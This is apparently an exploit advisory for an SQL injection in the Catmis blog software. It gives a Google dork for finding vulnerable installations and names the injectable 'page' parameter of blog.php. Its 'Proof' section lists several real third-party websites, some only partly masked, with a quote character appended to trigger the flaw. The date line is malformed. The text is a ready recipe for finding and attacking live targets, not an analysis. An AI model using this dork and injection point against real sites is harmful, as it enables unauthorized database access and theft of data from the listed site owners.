Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:

http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’
https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’
http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’
http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’
http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’